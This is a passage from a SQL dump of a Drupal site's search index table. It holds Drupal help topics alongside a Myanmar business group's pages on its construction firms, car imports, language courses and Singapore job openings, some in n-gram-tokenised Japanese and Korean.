buildings hospitals and schools 2 new zayya shwe pyi construction co ltd  new zayya shwe pyi construction co ltd was founded in may 30 th 2001 with company registration number 191 20012002 we standed as one of the trustful companies and completed projects in educational health care industrial buildings private housing high rise condominium in both public and private sectors throughout our existence we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects we built projects in areas such as education health care industrial housing our services are pre constructionservice general contractor design builder construction manager 3 aung nay wun construction co ltd aung nay wun construction co ltd was founded in 2005 with company registration number 265 20052006 emphasizing in residential commercial construction and interior design in private and government sectors some of the projects we have constructed are as follow naypyitaw staff housing project yandanar pone college in mandalay fire station in myawaddy division basic education middle high schools in various towns 32 in total fairpriced housing projects private housing projects in health industry two storied building technical school at bokalay two storied rcc building maupin 4 zeya new comet auto sale services co ltd our auto trade company was built from 1987 by buying permit of crew permit and importation and brother company new comet company ltd at 1990 established and private car saloon car truck car bus car and sparepart importation from japan besides zeya new comet company we cooperate with other new zayya shwepyi company aung nay win company tai myint aung company made importation of private car truck bus and sparepart from japan for 25 years with the employment of 100 workers and purchase of import permit from ministry of commerce our zeya new comet auto services company appointed expert staff and import japan car for smooth operation for customer satisfaction  ', 0),
(27, 'ja', 'help_search', ' adding a reference field to an entity subtype goal add an entity reference field to an entity subtype see managing content structure for more information on entities and reference fields steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of reference field you want to add the reference section of the select list shows the most common types of reference field choose other  if the entity type you want to reference is not listed the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen verify that the type of entity you want to reference is shown in type of item to reference  or select it if not enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing in the reference type section you will usually want to limit the entity subtypes that can be referenced for example if you are creating a content reference you can check one or two content type choices the choices will be easier for content editors to scan if you also choose a sort value normally the entity title or label field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(27, 'ja', 'node_search', '  会社沿 社沿革   会社沿 社沿革 cometadmin mon 7032023 1813 ニュー コメッ メット グルー ループ ープ企 プ企業 は 1996 年に設 に設立 設立さ 立され 以下の 下の支 の支店 支店で 店で組 で組織 組織さ 織され されて れてい ていま います 1 ニュー コメッ メット コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 2 ニュー ゼヤー シュエ ピィー ィーコ ーコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 3 アウン ネイ ワォン ォンコ ンコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 4 ゼヤー ニュー コメッ メット オート ートセ トセー セール ールス ルスと スとサ とサー サービ ービス ビス株 ス株式 株式会 式会社 5 ニュー コメッ メット トレー レーデ ーディ ディン ィング エージ ージェ ジェン ェンシ ンシー 株式会 式会社  1 ニュー コメッ メット コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社   当社の ニュー コメッ メット コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 は 2004 年に会 に会社 会社登 社登録 登録番 録番号 29520042005 で事業 事業を 業を開 を開始 開始し ヤンゴ ンゴン ゴン地 ン地方 地方域 エーヤ ーヤー ヤーワ ーワデ ワディ ディ地 ィ地方 地方域 ザガイ ガイン イン地 ン地方 地方域 マンダ ンダレ ダレー レー地 ー地方 地方域 とネピ ネピド ピドー ドー連 ー連合 連合領 合領土 領土を 土を拠 を拠点 拠点に 点に自 に自動 自動車 動車販 車販売 販売と 売と建 と建設 建設機 設機械 機械の 械の輸 の輸入 建設業 設業を 業を営 を営ん 営んで んでお でおり おりま ります 当社 ニュー コメッ メット コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 の 20132014 年と 20142015 年の竣 の竣工 竣工工 工工事 工事の 事の一 の一部 一部は 部は以 は以下 以下の 下の通 の通り 通りで りです 国籍青 籍青少 青少年 少年資 年資源 資源開 源開発 開発大 発大学 ザガイ ガイン ザガイ ガイン イン大 ン大学 教育と 育と学 と学習 学習の 習のた のため ための 2 階建て 建ての ての建 の建物 道路交 路交通 交通総 通総局 総局と チェタ ェタゴ タゴン ゴンテ ンティ ティッ ィッ建 ッ建設 建設会 設会社 の住宅 住宅プ 宅プロ プロジ ロジェ ジェク ェクト クト協 ト協力 上記の 記の活 の活動 活動に 動に加 に加え 加えて 政府機 府機関 機関お 関およ および よび民 び民間 民間の 間の建 の建物 建物の 物の修 の修繕 修繕工 繕工事 エーヤ ーヤー ヤーワ ーワデ ワディ ディ地 ィ地方 地方域 方域で 域で元 で元従 元従業 従業員 業員向 員向け 向けに けに手 に手頃 手頃な 頃な価 な価格 価格の 格の住 の住宅 住宅を 宅を建 を建設 建築設 築設計 設計図 当社は 専門コ 門コン コンサ ンサル サルタ ルタン タント 専門作 門作業 作業員 管理責 理責任 責任者 工事監 事監督 監督者 その 他国内 国内外 内外の 外の労 の労働 労働者 働者と 者とと ととも ともに 基準に 準に沿 に沿っ 沿って って最 て最新 最新化 新化さ 化され された れた資 た資機 資機材 機材に 材によ により 建物 道路 橋梁の 梁の建 の建設 建設工 設工事 工事を 事を行 を行っ 行って ってお ており おりま ります 当社は 社は理 は理念 理念建 念建築 病院 学校の 校の設 の設計 設計図 計図作 図作成 強度計 度計算 計算な 算など などの どの慈 の慈善 慈善事 善事業 事業を 業を可 を可能 な限り 限り手 り手掛 手掛け 掛けさ けさせ させて せてい ていた いただ ただき だきま きまし ました  2 ニュー ゼヤー ヤーシ ーシュ シュエ ピィー ィーコ ーコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社   当社の ニュー ゼヤー シュエ ピィー ィーコ ーコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 は 2000 年 5 月 30 日に設 に設立 設立さ 立され 会社登 社登録 登録番 録番号 番号は 19120012002 です 当社は 社は信 は信頼 信頼で 頼でき できる きる企 る企業 企業の 業の一 の一つ 一つで つであ であり 教育 医療 産業建 業建築 個人住 人住宅 住宅を 宅を提 を提供 提供し 供して してお ており 政府お 府およ および よび民 び民間 民間部 間部門 部門の 門の両 の両方 両方で 方で多 で多く 多くの くのプ のプロ プロジ ロジェ ジェク ェクト クトが トが実 が実施 実施さ 施され されて れてい ていま います 会社の 社の存 の存続 存続期 続期間 期間を 間を通 を通じ 通じて 複雑な 雑な建 な建設 建設プ 設プロ プロジ ロジェ ジェク ェクト クトに トにお におけ おける ける当 る当社 当社の 社の細 の細部 細部へ 部への へのこ のこだ こだわ だわり わりと りと専 と専門 専門知 門知識 当社は 社はコ はコス コスト スト削 ト削減 削減ソ 減ソリ ソリュ リュー ューシ ーショ ション ョンを ンを提 を提供 提供す 供する する能 る能力 能力で 力でク でクラ クライ ライア イアン アント ントか トから から多 ら多く 多くの くの賞 の賞賛 賞賛を 賛を受 を受け 受けて けてい ていま います 教育 医療 工業用 業用住 用住宅 住宅な 宅など 多くの くのプ のプロ プロジ ロジェ ジェク ェクト クトを トを建 を建設 建設し 設して してき てきま きまし ました 私たち たちは 建設前 設前サ 前サー サービ ービス 土建屋 デザイ ザイン インビ ンビル ビルダ ルダー 建設部 設部長 部長を 長を提 を提供 提供さ 供させ させて せてい ていた いただ ただき だきま きまし ました  3 アウン ネイ ワォン ォンコ ンコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社   当社の アウン ネイ ワォン ォンコ ンコン コンス ンスト ストラ トラク ラクシ クショ ション ョン株 ン株式 株式会 式会社 は 2005 年に設 に設立 設立さ 立され 会社登 社登録 登録番 録番号 番号は 26520052006 です 同社は 民間お 間およ および よび政 び政府 政府部 府部門 部門で 門で住 で住宅 住宅建 宅建築 商業建 業建築 インテ ンテリ テリア リアデ アデザ デザイ ザイン インの ンのプ のプロ プロジ ロジェ ジェク ェクト クトに トに従 に従事 従事し 事して してい ていま います 私たち たちの ちのプ のプロ プロジ ロジェ ジェク ェクト クトは トは以 は以下 以下の 下の通 の通り 通りで りです ネピド ピドー ドー職 ー職員 職員住 員住宅 住宅プ 宅プロ プロジ ロジェ ジェク ェクト マンダ ンダレ ダレー ヤダナ ダナポ ナポン ポン大 ン大学 ミャワ ャワデ ワディ ディ地 ィ地域 地域消 域消防 消防署 さまざ まざま ざまな まな郡 な郡区 郡区の 区の基 の基礎 基礎教 礎教育 教育中 高等学 等学校 計 32 都市 手頃な 頃な価 な価格 価格の 格の住 の住宅 住宅プ 宅プロ プロジ ロジェ ジェク ェクト 民間住 間住宅 2 階建て 建ての ての建 の建物 ボガレ ガレ工 レ工科 工科大 科大学 rcc 2 階建て 建ての ての建 の建物 マウビ ウビン  4 ゼヤー ニュー コメッ メット オート ートセ トセー セール ールス ルスと スとサ とサー サービ ービス ビス株 ス株式 株式会 式会社   当社の 社の自 の自動 自動車 動車商 車商社 商社は 1987 年に外 に外国 外国人 国人船 人船員 船員の 員の名 の名義 名義で 義で輸 で輸入 輸入許 入許可 許可証 可証の 証の売 の売買 売買を 買を行 を行う 行う個 う個人 個人事 人事業 事業と 業とし として して設 て設立 設立さ 立され されま れまし ました ニュー コメッ メット 株式会 式会社 会社は 1990 年に設 に設立 設立さ 立され ゼヤー ニュー コメッ メット オート ートセ トセー セール ールス ルスと スとサ とサー サービ ービス ビス株 ス株式 株式会 式会社 の子会 子会社 会社で 社です 家庭用 庭用自 用自動 自動車 各種サ 種サル サルー ルーン ーン自 ン自動 自動車 各種商 種商用 商用ト 用トラ トラッ ラック 観光 光 輸 輸送 輸送用 送用各 用各種 各種バ 種バス 各種機 種機械 を日本 日本よ 本より より直 り直接 直接仕 接仕入 仕入れ 輸入販 入販売 販売を 売を開 を開始 開始い 始いた いたし たしま しまし ました 当社 ゼヤー ニュー コメッ メット オート ートセ トセー セール ールス ルスと スとサ とサー サービ ービス ビス株 ス株式 株式会 式会社 には 業務を 務を促 を促進 促進す 進する する資 る資格 資格の 格のあ のある ある従 る従業 従業員 業員が 員がい がいま います お客様 客様に 様に十 に十分 十分に 分にご にご満 ご満足 満足い 足いた いただ ただけ だける けるよ るよう 良い車 い車を 車を日 を日本 日本か 本から から直 ら直輸 直輸入 輸入し 入して してお ており おりま ります  ', 0),
(27, 'ko', 'help_search', ' adding a reference field to an entity subtype goal add an entity reference field to an entity subtype see managing content structure for more information on entities and reference fields steps navigate to the page for managing the entity subtype you want to add the field to for example to add a field to a content type in the manage administrative menu navigate to structure   content types  find the particular subtype that you want to add the field to and click manage fields  click add field  in add a new field  select the type of reference field you want to add the reference section of the select list shows the most common types of reference field choose other  if the entity type you want to reference is not listed the label field should now be visible enter a label for the field which is used as the field label for both content editing and content display click save and continue  on the next screen verify that the type of entity you want to reference is shown in type of item to reference  or select it if not enter a value for allowed number of values  you can limit the field to one value per entity item a set number of values or set it to have unlimited values click save field settings  on the next screen optionally edit the settings for label   help text  text to be displayed below the field on the content editing page and required field  to make it so a value must be entered in order to save the content when editing in the reference type section you will usually want to limit the entity subtypes that can be referenced for example if you are creating a content reference you can check one or two content type choices the choices will be easier for content editors to scan if you also choose a sort value normally the entity title or label field click save settings  you should be returned to the manage fields page with your new field in the list  ', 1787923659),
(27, 'ko', 'node_search', ' company history company history cometadmin mon 7032023 1813 coming soon  ', 0),
(28, 'en', 'help_search', ' managing text filters and text formats goal configure text formats on the site what are text filters and text formats  a text filter is a processing step that can be applied to text either to transform it in some way such as converting urls in the text into html links or to defend against potentiallydangerous input from site users a text format is an ordered sequence of text filters text filters are provided by modules text formats are managed by the core filter module text fields that have formatted in the field type name such as text formatted   use text formats users choose the text format when editing the field text when the field text is shown on the site it is processed by the chosen text format administrators can configure text formats and assign permissions for who can use each format if the core text editor module is enabled administrators can also associate visual editors with text formats what text filters are available  some of the more commonly used text filters are limit allowed html tags and correct faulty html limits which html tags can be used useful both for site security and enforcing site design convert line breaks into html line breaks in html source are displayed as horizontal spaces this filter converts line breaks into html paragraph and line break tags convert urls into links takes plain urls in text and turns them into html links restrict images to this site for text formats that allow html image tags restricts images to urls within this site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  if you do not have the core text editor module installed the menu link and page title will instead be text formats  click configure to configure an existing text format or  add text format to create a new text format enter the desired name for the text format check the roles that can use this text format some html tags allow users to embed malicious links or scripts in text to ensure security anonymous and untrusted users should only have access to text formats that restrict them to either plain text or a safe set of html tags improper text format configuration is a security risk if the core text editor module is installed see the related topic to connect a text editor to this text format under enabled filters  check the text filters that you want to use under filter processing order  drag the filters to the correct order choose the order carefully for example if you have a filter that results in a particular html tag being added to the text that should run after a filter that restricts html tags to avoid deleting the new tags the first filter added under filter settings  verify and adjust the settings for each active filter that has configuration options click save configuration  which will return you to the text formats and editors page repeat these steps if you have additional text formats to configure  ', 1787923659),
(28, 'en', 'node_search', ' hit language center has started teaching korean language courses and japanese language courses in cooperation with new comet trading agency those who want to learn can register quickly hit language center has started teaching korean language courses and japanese language courses in cooperation with new comet trading agency those who want to learn can register quickly admin fri 7212023 1628 sat 7082023 929 hit language center has started teaching korean language courses and japanese language courses in cooperation with new comet trading agency those who want to learn can register quickly we have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively hit language center 9775556677 9950947491 95015742 9965104911 18393300 18393344  ', 0),
(28, 'ja', 'help_search', ' managing text filters and text formats goal configure text formats on the site what are text filters and text formats  a text filter is a processing step that can be applied to text either to transform it in some way such as converting urls in the text into html links or to defend against potentiallydangerous input from site users a text format is an ordered sequence of text filters text filters are provided by modules text formats are managed by the core filter module text fields that have formatted in the field type name such as text formatted   use text formats users choose the text format when editing the field text when the field text is shown on the site it is processed by the chosen text format administrators can configure text formats and assign permissions for who can use each format if the core text editor module is enabled administrators can also associate visual editors with text formats what text filters are available  some of the more commonly used text filters are limit allowed html tags and correct faulty html limits which html tags can be used useful both for site security and enforcing site design convert line breaks into html line breaks in html source are displayed as horizontal spaces this filter converts line breaks into html paragraph and line break tags convert urls into links takes plain urls in text and turns them into html links restrict images to this site for text formats that allow html image tags restricts images to urls within this site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  if you do not have the core text editor module installed the menu link and page title will instead be text formats  click configure to configure an existing text format or  add text format to create a new text format enter the desired name for the text format check the roles that can use this text format some html tags allow users to embed malicious links or scripts in text to ensure security anonymous and untrusted users should only have access to text formats that restrict them to either plain text or a safe set of html tags improper text format configuration is a security risk if the core text editor module is installed see the related topic to connect a text editor to this text format under enabled filters  check the text filters that you want to use under filter processing order  drag the filters to the correct order choose the order carefully for example if you have a filter that results in a particular html tag being added to the text that should run after a filter that restricts html tags to avoid deleting the new tags the first filter added under filter settings  verify and adjust the settings for each active filter that has configuration options click save configuration  which will return you to the text formats and editors page repeat these steps if you have additional text formats to configure  ', 1787923659),
(28, 'ja', 'node_search', ' hit language center は new comet trading agency との協 の協力 協力の 力のも のもと 韓国語 国語コ 語コー コース ースと スと日 と日本 日本語 本語コ 語コー コース ースの スの教 の教室 教室を 室を開 を開始 開始し 始しま しまし ました 学びた びたい たい方 い方は 早めに めに登 に登録 登録し 録して してく てくだ くださ ださい  hit language center は new comet trading agency との協 の協力 協力の 力のも のもと 韓国語 国語コ 語コー コース ースと スと日 と日本 日本語 本語コ 語コー コース ースの スの教 の教室 教室を 室を開 を開始 開始し 始しま しまし ました 学びた びたい たい方 い方は 早めに めに登 に登録 登録し 録して してく てくだ くださ ださい admin fri 7212023 1633 sat 7082023 929 hit language center は new comet trading agency との協 の協力 協力の 力のも のもと 韓国語 国語コ 語コー コース ースと スと日 と日本 日本語 本語コ 語コー コース ースの スの教 の教室 教室を 室を開 を開始 開始し 始しま しまし ました 学びた びたい たい方 い方は 早めに めに登 に登録 登録し 録して してく てくだ くださ ださい 私たち たちは ちは外 は外国 外国の 国の仕 の仕事 仕事の 事の機 の機会 機会を 会をで をでき できる きるだ るだけ だけ早 け早く 早く検 く検索 検索し すでに でに効 に効果 効果的 果的な 的な会 な会話 会話方 話方法 方法を 法を教 を教え 教えて えてい ていま います hit language center 97755566770995094749109501574209965104911018393300  ', 0),
(28, 'ko', 'help_search', ' managing text filters and text formats goal configure text formats on the site what are text filters and text formats  a text filter is a processing step that can be applied to text either to transform it in some way such as converting urls in the text into html links or to defend against potentiallydangerous input from site users a text format is an ordered sequence of text filters text filters are provided by modules text formats are managed by the core filter module text fields that have formatted in the field type name such as text formatted   use text formats users choose the text format when editing the field text when the field text is shown on the site it is processed by the chosen text format administrators can configure text formats and assign permissions for who can use each format if the core text editor module is enabled administrators can also associate visual editors with text formats what text filters are available  some of the more commonly used text filters are limit allowed html tags and correct faulty html limits which html tags can be used useful both for site security and enforcing site design convert line breaks into html line breaks in html source are displayed as horizontal spaces this filter converts line breaks into html paragraph and line break tags convert urls into links takes plain urls in text and turns them into html links restrict images to this site for text formats that allow html image tags restricts images to urls within this site steps in the manage administrative menu navigate to configuration   content authoring   text formats and editors  if you do not have the core text editor module installed the menu link and page title will instead be text formats  click configure to configure an existing text format or  add text format to create a new text format enter the desired name for the text format check the roles that can use this text format some html tags allow users to embed malicious links or scripts in text to ensure security anonymous and untrusted users should only have access to text formats that restrict them to either plain text or a safe set of html tags improper text format configuration is a security risk if the core text editor module is installed see the related topic to connect a text editor to this text format under enabled filters  check the text filters that you want to use under filter processing order  drag the filters to the correct order choose the order carefully for example if you have a filter that results in a particular html tag being added to the text that should run after a filter that restricts html tags to avoid deleting the new tags the first filter added under filter settings  verify and adjust the settings for each active filter that has configuration options click save configuration  which will return you to the text formats and editors page repeat these steps if you have additional text formats to configure  ', 1787923659),
(28, 'ko', 'node_search', ' hit language center 는 new comet trading agency 와의 협력으 력으로 한국어 코스와 일본어 코스를 개설했 설했습 했습니 습니다 관심있 심있는 분들은 빠르게 등록해 록해주 해주세 주세요  hit language center 는 new comet trading agency 와의 협력으 력으로 한국어 코스와 일본어 코스를 개설했 설했습 했습니 습니다 관심있 심있는 분들은 빠르게 등록해 록해주 해주세 주세요 admin fri 7212023 1636 sat 7082023 929 hit language center 는 new comet trading agency 와의 협력으 력으로 한국어 코스와 일본어 코스를 개설했 설했습 했습니 습니다 관심있 심있는 분들은 빠르게 등록해 록해주 해주세 주세요 우리는 외국의 취업 기회를 최대한 빨리 찾아드 아드리 드리고 이미 효과적 과적인 대화 방법을 가르치 르치고 있습니 습니다 hit language center 9775556677 9950947491 95015742 9965104911 18393300 18393344  ', 0),
(29, 'en', 'help_search', ' changing the appearance of your site what is a theme  a theme is a set of files that define the visual look and feel of your site the core software and modules that run on your site determine which content including html text and other data stored in the database uploaded images and any other asset files is displayed on the pages of your site the theme determines the html markup and css styling that wraps the content several basic themes are supplied with the core software additional contributed themes can be downloaded separately from the download extend page on drupalorg  or you can create your own theme what is a base theme  a base theme is a theme that is not meant to be used directly on a site but instead acts as a scaffolding for building other themes the core stable 9 theme is one example other base themes can be downloaded from the download extend page on drupalorg  what is a layout  a layout is a template that defines where blocks and other pieces of content should be displayed the core layout discovery module allows modules and themes to register layouts and the core layout builder module provides a visual interface for placing fields and blocks in layouts for entity subtypes and individual entity items see managing content structure for more on entities and fields  changing site appearance overview the main way to change the overall appearance of your site is to switch the default theme the core layout builder and layout discovery modules allow you to define layouts for your site s content and the core breakpoint module helps themes change appearance for differentsized devices see the related topics listed below for specific tasks additional resources extending and customizing your site drupal user guide  theming drupal ', 1787923659),
(29, 'en', 'node_search', ' the person in charge of the korean side of new comet trading agency mrhong explained the question of when you can answer the koshipa test estimate at hit language center the person in charge of the korean side of new comet trading agency mrhong explained the question of when you can answer the koshipa test estimate at hit language center admin fri 7212023 1637 sat 7082023 1043 the person in charge of the korean side of new comet trading agency mrhong explained the question of when you can answer the koshipa test estimate at hit language center 872023  ', 0),
(29, 'ja', 'help_search', ' changing the appearance of your site what is a theme  a theme is a set of files that define the visual look and feel of your site the core software and modules that run on your site determine which content including html text and other data stored in the database uploaded images and any other asset files is displayed on the pages of your site the theme determines the html markup and css styling that wraps the content several basic themes are supplied with the core software additional contributed themes can be downloaded separately from the download extend page on drupalorg  or you can create your own theme what is a base theme  a base theme is a theme that is not meant to be used directly on a site but instead acts as a scaffolding for building other themes the core stable 9 theme is one example other base themes can be downloaded from the download extend page on drupalorg  what is a layout  a layout is a template that defines where blocks and other pieces of content should be displayed the core layout discovery module allows modules and themes to register layouts and the core layout builder module provides a visual interface for placing fields and blocks in layouts for entity subtypes and individual entity items see managing content structure for more on entities and fields  changing site appearance overview the main way to change the overall appearance of your site is to switch the default theme the core layout builder and layout discovery modules allow you to define layouts for your site s content and the core breakpoint module helps themes change appearance for differentsized devices see the related topics listed below for specific tasks additional resources extending and customizing your site drupal user guide  theming drupal ', 1787923659),
(29, 'ja', 'node_search', ' new comet trading agency の韓国 韓国側 国側担 側担当 担当者 mrhong が hit language center で koshipa test の評価 評価結 価結果 結果が 果が得 が得ら 得られ られる れる見 る見込 見込み 込みの みの日 の日に 日につ につい ついて いて説 て説明 説明し 明しま しまし ました  new comet trading agency の韓国 韓国側 国側担 側担当 担当者 mrhong が hit language center で koshipa test の評価 評価結 価結果 結果が 果が得 が得ら 得られ られる れる見 る見込 見込み 込みの みの日 の日に 日につ につい ついて いて説 て説明 説明し 明しま しまし ました admin fri 7212023 1644 sat 7082023 1043 new comet trading agency の韓国 韓国側 国側担 側担当 担当者 mrhong が hit language center で koshipa test の評価 評価結 価結果 結果が 果が得 が得ら 得られ られる れる見 る見込 見込み 込みの みの日 の日に 日につ につい ついて いて説 て説明 説明し 明しま しまし ました 2023 年 7 月 8 日  ', 0),
(29, 'ko', 'help_search', ' changing the appearance of your site what is a theme  a theme is a set of files that define the visual look and feel of your site the core software and modules that run on your site determine which content including html text and other data stored in the database uploaded images and any other asset files is displayed on the pages of your site the theme determines the html markup and css styling that wraps the content several basic themes are supplied with the core software additional contributed themes can be downloaded separately from the download extend page on drupalorg  or you can create your own theme what is a base theme  a base theme is a theme that is not meant to be used directly on a site but instead acts as a scaffolding for building other themes the core stable 9 theme is one example other base themes can be downloaded from the download extend page on drupalorg  what is a layout  a layout is a template that defines where blocks and other pieces of content should be displayed the core layout discovery module allows modules and themes to register layouts and the core layout builder module provides a visual interface for placing fields and blocks in layouts for entity subtypes and individual entity items see managing content structure for more on entities and fields  changing site appearance overview the main way to change the overall appearance of your site is to switch the default theme the core layout builder and layout discovery modules allow you to define layouts for your site s content and the core breakpoint module helps themes change appearance for differentsized devices see the related topics listed below for specific tasks additional resources extending and customizing your site drupal user guide  theming drupal ', 1787923659),
(29, 'ko', 'node_search', ' new comet trading agency 의 한국 측 담당자 당자인 홍씨가 hit language center 에서 koshipa test 평가 결과를 받을 수 있는 시기에 대해 설명했 명했습 했습니 습니다  new comet trading agency 의 한국 측 담당자 당자인 홍씨가 hit language center 에서 koshipa test 평가 결과를 받을 수 있는 시기에 대해 설명했 명했습 했습니 습니다 admin fri 7212023 1645 sat 7082023 1043 new comet trading agency 의 한국 측 담당자 당자인 홍씨가 hit language center 에서 koshipa test 평가 결과를 받을 수 있는 시기에 대해 설명했 명했습 했습니 습니다 872023  ', 0),
(30, 'en', 'help_search', ' managing and deploying configuration what is the configuration system  the configuration system provides the ability for administrators to customize the site and to move and synchronize configuration changes between development sites and the live site it does this in 2 ways providing storage for configuration providing a process in which configuration changes can be imported and exported between instances of the same site for example from dev to staging to live  what is configuration data  configuration data describes settings that define how your site behaves or is displayed for example when a site administrator updates settings using an administrative form these settings are stored as configuration data configuration data describes settings as simple as a site name and as complex as a view or image style what kinds of configuration are there  active configuration active configuration is the current working configuration of a site storage of active configuration is defined by the site and resides in the database by default simple configuration a simple configuration item is a group of settings such as the settings for a module or theme each simple configuration item has its own unique structure configuration entities configuration entities are userdefined configuration items grouped by type such as views image styles and content types each configuration entity within a type has a similar structure default configuration default configuration can be defined by a module theme or installation profile in its config install or config optional directories configuration is provided in yaml files file extension yml yaml is a humanreadable data serialization standard that is used by the core software for several purposes once the default configuration has been imported into the site s active configuration through installing the extension that configuration is owned by the site not the extension this means that future updates of the extension will not override the site s active configuration for that extension what is configuration synchronization  configuration synchronization is the process of exporting and importing configuration to keep configuration synchronized between different versions of a site for example between a development site and the live site each site has unique identifier also called a uuid  which identifies the site to the system in any instance of the site as long as the site instances have been reproduced as clones cloning is when the codebase and database are copied to create a new site instance when site instances are cloned a dev instance of the site has the same uuid as the live instance when site instances share the same uuid configuration can be exported from one instance to another the following list contains terms and concepts related to configuration synchronization exported configuration when configuration is exported the active configuration is exported as a set of files in yaml format when using the configuration synchronization administrative ui configuration can be exported as a fullexport or singleitem archive this archive can then be imported into the destination site instance imported configuration imported configuration is configuration that has been exported from another instance of the site the source and is now being imported into another site instance the destination thereby updating its active configuration to match the imported configuration data set configuration sync directory the configuration sync directory location is set in the site s settingsphp file when configuration is exported the active configuration is exported and described in yaml files which are stored in the configuration sync directory after the first export the system compares the site s active configuration with the configuration data in the sync directory and will only export active configuration items that are different than their counterparts in the sync directory managing configuration overview configuration management tasks such as exporting or importing configuration and synchronizing configuration can be done either through the administrative ui provided by the core configuration manager module or a commandline interface cli tool defining a configuration sync directory path other than the default value requires read write access to the site s settingsphp file most modules and themes also provide settings forms for updating the configuration they provide see the related topics listed below for specific tasks additional resources configuration management workflow using drush concept types of data drupal user guide  concept development sites drupal user guide  making a development site drupal user guide  ', 1787923659),
(30, 'en', 'node_search', ' we urgently need the following skilled workers to work in singapore we urgently need the following skilled workers to work in singapore admin fri 7212023 1658 sun 7092023 959 we urgently need the following skilled workers to work in singapore 1 s pass visa only for men position project operations coordinator degree must be able to speak english well must have good knowledge and understanding of equipment and sales buying experience must have admin experience by computer record keeping data entry filing etc be mechanical would be more convenient 2 work permit visa only for men position admin support assistant diploma graduate must be able to speak english well must have admin experience must have good knowledge and understanding of equipment and sales buying experience by computer record keeping data entry filing etc new comet trading agency co ltd 9775556677 9950947491 95015742 9965104911 18393300 18393344  ', 0),
(30, 'ja', 'help_search', ' managing and deploying configuration what is the configuration system  the configuration system provides the ability for administrators to customize the site and to move and synchronize configuration changes between development sites and the live site it does this in 2 ways providing storage for configuration providing a process in which configuration changes can be imported and exported between instances of the same site for example from dev to staging to live  what is configuration data  configuration data describes settings that define how your site behaves or is displayed for example when a site administrator updates settings using an administrative form these settings are stored as configuration data configuration data describes settings as simple as a site name and as complex as a view or image style what kinds of configuration are there  active configuration active configuration is the current working configuration of a site storage of active configuration is defined by the site and resides in the database by default simple configuration a simple configuration item is a group of settings such as the settings for a module or theme each simple configuration item has its own unique structure configuration entities configuration entities are userdefined configuration items grouped by type such as views image styles and content types each configuration entity within a type has a similar structure default configuration default configuration can be defined by a module theme or installation profile in its config install or config optional directories configuration is provided in yaml files file extension yml yaml is a humanreadable data serialization standard that is used by the core software for several purposes once the default configuration has been imported into the site s active configuration through installing the extension that configuration is owned by the site not the extension this means that future updates of the extension will not override the site s active configuration for that extension what is configuration synchronization  configuration synchronization is the process of exporting and importing configuration to keep configuration synchronized between different versions of a site for example between a development site and the live site each site has unique identifier also called a uuid  which identifies the site to the system in any instance of the site as long as the site instances have been reproduced as clones cloning is when the codebase and database are copied to create a new site instance when site instances are cloned a dev instance of the site has the same uuid as the live instance when site instances share the same uuid configuration can be exported from one instance to another the following list contains terms and concepts related to configuration synchronization exported configuration when configuration is exported the active configuration is exported as a set of files in yaml format when using the configuration synchronization administrative ui configuration can be exported as a fullexport or singleitem archive this archive can then be imported into the destination site instance imported configuration imported configuration is configuration that has been exported from another instance of the site the source and is now being imported into another site instance the destination thereby updating its active configuration to match the imported configuration data set configuration sync directory the configuration sync directory location is set in the site s settingsphp file when configuration is exported the active configuration is exported and described in yaml files which are stored in the configuration sync directory after the first export the system compares the site s active configuration with the configuration data in the sync directory and will only export active configuration items that are different than their counterparts in the sync directory managing configuration overview configuration management tasks such as exporting or importing configuration and synchronizing configuration can be done either through the administrative ui provided by the core configuration manager module or a commandline interface cli tool defining a configuration sync directory path other than the default value requires read write access to the site s settingsphp file most modules and themes also provide settings forms for updating the configuration they provide see the related topics listed below for specific tasks additional resources configuration management workflow using drush concept types of data drupal user guide  concept development sites drupal user guide  making a development site drupal user guide  ', 1787923659),
